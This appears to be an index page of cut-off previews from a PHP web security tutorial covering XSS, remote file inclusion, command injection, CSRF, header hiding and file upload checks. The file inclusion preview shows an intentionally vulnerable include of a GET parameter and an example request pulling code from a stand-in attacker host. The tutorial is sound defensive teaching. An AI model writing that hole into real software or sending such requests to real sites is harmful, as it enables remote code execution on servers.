Tutorial by Examples

By default PHP will output errors, warnings and notice messages directly on the page if something unexpected in a script occurs. This is useful for resolving specific issues with a script but at the same time it outputs information you don't want your users to know. Therefore it's good practice to ...
Problem Cross-site scripting is the unintended execution of remote code by a web client. Any web application might expose itself to XSS if it takes input from a user and outputs it directly on a web page. If input includes HTML or JavaScript, remote code can be executed when this content is rende...
Remote File Inclusion Remote File Inclusion (also known as RFI) is a type of vulnerability that allows an attacker to include a remote file. This example includes a remotely hosted file containing malicious code: <?php include $_GET['page']; /vulnerable.php?page=http://evil.example.com/...
Problem In a similar way that SQL injection allows an attacker to execute arbitrary queries on a database, command-line injection allows someone to run untrusted system commands on a web server. With an improperly secured server this would give an attacker complete control over a system. Let's sa...
By default, PHP will tell the world what version of PHP you are using, e.g. X-Powered-By: PHP/5.3.8. To fix this you can either change php.ini: expose_php = off Or change the header: header("X-Powered-By: Magic"); Or if you'd prefer an .htaccess method: Header unset X-Powered-By ...
strip_tags is a very powerful function if you know how to use it. For preventing cross-site scripting attacks there are better methods, such as character encoding, but stripping tags is useful in some cases. Basic Example $string = '<b>Hello,<> please remove the <> tags.&...
Problem Cross-Site Request Forgery (CSRF) can force an end user to unknowingly generate malicious requests to a web server. This attack vector can be exploited in both POST and GET requests. Let's say for example the URL endpoint /delete.php?accnt=12 deletes the account passed in the accnt parameter ...
If you want users to upload files to your server you need to do a couple of security checks before you actually move the uploaded file to your web directory. The uploaded data: This array contains user-submitted data and is not information about the file itself. While usually this data is generate...
